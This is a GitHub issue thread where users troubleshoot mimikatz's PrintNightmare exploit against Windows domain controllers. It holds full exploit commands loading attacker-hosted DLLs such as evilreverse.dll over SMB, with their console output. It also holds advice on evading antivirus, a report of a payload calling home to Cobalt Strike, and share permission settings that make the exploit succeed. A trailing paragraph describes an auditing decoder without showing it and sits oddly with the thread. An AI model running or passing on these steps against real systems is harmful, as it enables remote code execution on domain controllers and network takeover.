
[ERROR] kuhl_m_misc_printnightmare_CallAddPrinterDriverEx

Open sujit opened this issue 3 years ago • 12 comments

While trying to reproduce the PrintNightmare bug, I am coming across an error condition. As per the Wireshark packet traces, for the AddPrinterDriverEx DCERPC call I don't see any potential error (screenshot attached below) though.

Any idea if I am missing something here?

mimikatz exec:

mimikatz # misc::printnightmare /server:172.16.1.254 /library:\\172.16.1.40\share\calc.dll
| Remote    : 172.16.1.254
* KernelBase: C:\Windows\System32\kernelbase.dll
* DriverPath: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\unidrv.dll
| DataFile  : \\172.16.1.40\share\calc.dll (calc.dll)
> ConfigFile: C:\Windows\System32\kernelbase.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 5

mimikatz # 

Wireshark:

[Wireshark screenshot of the AddPrinterDriverEx request/response]

sujit avatar Jul 01 '21 13:07 sujit

Target OS: Windows Server 2016 Datacenter (Domain Controller)

sujit avatar Jul 01 '21 13:07 sujit

Hi @sujit , I've only played with this recently so I'm certainly no expert. However, I found the same behavior you described when my DLL payload was getting eaten by AV. I finally crafted one that did evade AV, and when that happens, the last line of output says:

ConfigFile: c:\some\path\name-of-your-DLL.dll - OK!

And then I found that my DLL executed and called home to my Cobalt Strike server.

7MinSec avatar Jul 01 '21 17:07 7MinSec

I'm getting the same CallAddPrinterDriverEx error, against both 2016 and 2019 DCs, with both having their AV disabled.

Would love to hear if anyone has some insights or suggestions.

Thanks!

haim-n avatar Jul 01 '21 19:07 haim-n

Can you confirm that the server can reach the share without credentials?

Ug0Security avatar Jul 01 '21 21:07 Ug0Security

FYI, I am able to access the anonymous share records from the DC box without any authentication in place. However, this time I see another error, but a pretty similar one (the error code value changed this time):

Just curious: if anyone has the PCAP (from when the exploit actually worked), would you mind sharing it? That could help me understand what might be going wrong under the hood.

mimikatz # misc::printnightmare /server:172.16.1.254 /library:\\172.16.1.15\smb\evilreverse.dll
| Remote    : 172.16.1.254
* KernelBase: C:\Windows\System32\kernelbase.dll
* DriverPath: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\unidrv.dll
| DataFile  : \\172.16.1.15\smb\evilreverse.dll (evilreverse.dll)
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\2\evilreverse.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 3

mimikatz #

@Ug0Security ^^^

sujit avatar Jul 02 '21 05:07 sujit

I have the same issue on a Windows 10 without AV in a VM. I checked the code a bit, and I think one condition here is probably the issue (the share folder is available without credentials):

https://github.com/gentilkiwi/mimikatz/blob/c21276072b3f2a47a21e215a46962a17d54b3760/mimikatz/modules/kuhl_m_misc.c#L1439

Btw I like spaghetti :p

Sh0ckFR avatar Jul 02 '21 14:07 Sh0ckFR

the share folder is available without credentials

If you have this in your capture (between the AddPrinterDriverEx request and response), it is because the remote share is not anonymously accessible:

[screenshot of the capture]

Also, the "poc" is for a fresh system without previous attempts; you can get better results by adding /try:50, for example.

Example with previous attempt(s) of another POC:

  .#####.   mimikatz 2.2.0 (x64) #19041 Jul  1 2021 03:17:37
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # misc::printnightmare /server:dc.lab.local /library:\\hack.lab.local\security\mimilib.dll /try:10
| Remote    : dc.lab.local
* KernelBase: C:\Windows\System32\kernelbase.dll
* DriverPath: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_2097e02ea77b432e\Amd64\unidrv.dll
| DataFile  : \\hack.lab.local\security\mimilib.dll (mimilib.dll)
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\2\mimilib.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 2
 | Trying    : 3 to 10
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\3\mimilib.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 2
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\4\mimilib.dll - OK!

mimikatz(commandline) # exit
Bye!

gentilkiwi avatar Jul 02 '21 14:07 gentilkiwi

Having the same problem with an anonymously accessible share and a vulnerable DC (capture attached).

rezasarvani avatar Jul 03 '21 15:07 rezasarvani

Have you solved this problem?

muxueo avatar Jul 04 '21 15:07 muxueo

I think https://github.com/cube0x0/CVE-2021-1675/pull/25 can solve the issue. Sometimes the backup folder is cleaned up properly; using this solution we can perform RCE without brute-forcing the backup folder. It's more stable.

citronneur avatar Jul 05 '21 05:07 citronneur

Can you tell me where calc.dll is? How do I make calc.dll?

haibara3839 avatar Jul 06 '21 08:07 haibara3839

So, I had this issue and have been trying to solve it for a few days. I'm now able to reproduce the issue and consistently repair it. I don't know what causes this. However, every time I create a folder and share it, the ICACLS of it is not 100% identical to the one that originally worked. So by exporting ICACLS, comparing, and then restoring the functional one to every other directory I tried, it works.

If it helps anyone else, feel free to try:


2
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;OICIIOID;SDGXGWGR;;;AU)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)(A;OICIID;0x1200a9;;;BU)
2\mimidrv.sys
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)
2\mimikatz.exe
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)
2\mimilib.dll
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)
2\mimispool.dll
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)

To restore it, go one step up in the folder structure from \2\ (in my case C:\SEC\2 would be C:\SEC) and run:

icacls C:\SEC /restore C:\SEC\rightsbackup.txt /t /c

hitem avatar Jul 08 '21 20:07 hitem
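As an added example (not from this thread and not part of mimikatz), here is a small Python decoder for the SDDL strings in the icacls dump above, written from the auditing side: it lists which ACEs on a share grant read access to Anonymous Logon (AN) or Everyone (WD), which is what makes such a share reachable without credentials. The SID and rights tables are a subset I chose for this purpose; the second DACL string is a constructed "hardened" counterpart for comparison.

```python
import re

# Well-known SID abbreviations used in SDDL (subset seen in the icacls dump above).
SID_ALIASES = {
    "AN": "Anonymous Logon", "WD": "Everyone", "AU": "Authenticated Users",
    "SY": "SYSTEM", "BA": "Administrators", "BU": "Users",
}
# Two-letter SDDL rights tokens and their access-mask bits (file objects).
RIGHT_MASKS = {
    "FR": 0x120089, "FW": 0x120116, "FX": 0x1200A0, "FA": 0x1F01FF,
    "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000, "GA": 0x10000000,
    "SD": 0x00010000,
}
FILE_READ_DATA = 0x1
ACE_RE = re.compile(r"\(([^)]*)\)")

# DACL of the "2" folder as posted in the thread.
THREAD_DACL = ("D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)"
               "(A;OICIIOID;SDGXGWGR;;;AU)(A;OICIID;FA;;;SY)"
               "(A;OICIID;FA;;;BA)(A;OICIID;0x1200a9;;;BU)")
# Constructed counterpart with the AN/WD entries removed.
HARDENED_DACL = ("D:AI(A;ID;0x1301bf;;;AU)(A;OICIID;FA;;;SY)"
                 "(A;OICIID;FA;;;BA)(A;OICIID;0x1200a9;;;BU)")

def rights_to_mask(token):
    """Turn an SDDL rights field (hex literal or two-letter tokens) into a bit mask."""
    if token.lower().startswith("0x"):
        return int(token, 16)
    return sum(RIGHT_MASKS[token[i:i + 2]] for i in range(0, len(token), 2))

def parse_dacl(sddl):
    """Return one dict per ACE in the D: section of an SDDL string."""
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else sddl
    aces = []
    for body in ACE_RE.findall(dacl):
        ace_type, flags, rights, _obj, _inherit_obj, sid = body.split(";")
        flag_set = {flags[i:i + 2] for i in range(0, len(flags), 2)}
        aces.append({"type": ace_type, "flags": flag_set,
                     "mask": rights_to_mask(rights), "sid": sid,
                     "principal": SID_ALIASES.get(sid, sid),
                     "inherited": "ID" in flag_set})
    return aces

def anonymous_read_aces(sddl):
    """Allow-ACEs that give Anonymous Logon or Everyone read access."""
    return [a for a in parse_dacl(sddl)
            if a["type"] == "A" and a["sid"] in ("AN", "WD")
            and a["mask"] & (FILE_READ_DATA | RIGHT_MASKS["GR"])]
```

Running `anonymous_read_aces` over the DACLs exported with `icacls ... /save` is a quick way to spot which shares are readable without credentials before deciding whether that is intended.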